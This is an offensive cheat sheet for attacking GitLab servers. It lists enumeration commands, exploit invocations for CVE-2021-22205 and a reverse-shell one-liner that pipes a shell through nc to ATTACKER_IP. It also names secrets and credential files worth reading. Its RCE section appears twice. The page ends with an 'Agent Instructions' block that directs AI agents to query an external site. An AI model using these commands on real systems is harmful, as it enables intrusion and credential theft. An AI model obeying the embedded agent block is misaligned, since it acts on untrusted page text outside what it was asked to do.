# GitLab

## Discovery

* Default ports: 80, 443
* Login page: `/users/sign_in`
* API: `/api/v4/`

***

## Version Enumeration

```bash
# In page source or footer
curl -s http://TARGET | grep 'gitlab'

# Via API (if accessible)
curl -s http://TARGET/api/v4/version
```

***

## Username Enumeration

GitLab rate limits enumeration by default (`config/initializers/devise.rb`):

```ruby
config.lock_strategy = :failed_attempts
config.maximum_attempts = 10
```

### Registration Page Enumeration

If registration is enabled, try registering with known usernames - error if exists.

***

## Public Repositories

```bash
# Browse public projects
http://TARGET/explore/projects

# User profiles
http://TARGET/users/USERNAME
```

***

## Authenticated RCE (CVE-2021-22205)

**Affects:** GitLab CE/EE < 13.10.3, 13.9.6, 13.8.8

```bash
# ExifTool metadata parsing RCE
# Exploit available on GitHub
python3 exploit.py -u http://TARGET -c 'id'
```

***

## Import Feature RCE

Older versions allow importing malicious project files:

1. Create malicious repo with hooks
2. Import via `New Project → Import`
3. Hooks execute on clone/push

***

## API Token Theft

If you have file read:

```bash
# GitLab Rails secrets
/opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml

# Database config
/var/opt/gitlab/gitlab-rails/etc/database.yml

# GitLab config
/etc/gitlab/gitlab.rb
```

***

## Default Paths

| Path                    | Description            |
| ----------------------- | ---------------------- |
| `/opt/gitlab/`          | GitLab Omnibus install |
| `/var/opt/gitlab/`      | GitLab data            |
| `/var/log/gitlab/`      | Logs                   |
| `/etc/gitlab/gitlab.rb` | Main config            |

***

## Authenticated RCE (CVE-2021-22205)

**Affects:** GitLab CE/EE < 13.10.3, < 13.9.6, < 13.8.8

ExifTool metadata parsing RCE. Works if you can register an account.

```bash
# Exploit
python3 gitlab_13_10_2_rce.py -t http://TARGET -u username -p password -c 'id'

# Reverse shell
python3 gitlab_13_10_2_rce.py -t http://TARGET -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc ATTACKER_IP 8443 >/tmp/f'
```

**PoC:** <https://www.exploit-db.com/exploits/49951>

***

## Username Enumeration

```bash
# Enumeration script
./gitlab_userenum.sh --url http://TARGET:8081/ --userlist users.txt
```

Registration page also reveals if username/email exists.

***

## CVEs

| CVE            | Description                       |
| -------------- | --------------------------------- |
| CVE-2021-22205 | Auth RCE via ExifTool (< 13.10.3) |
| CVE-2021-22214 | SSRF via webhook                  |
| CVE-2020-10977 | Arbitrary file read               |
| CVE-2018-19571 | SSRF + CRLF                       |


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://book.ice-wzl.xyz/things-i-have-pwnd-before/gitlab.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.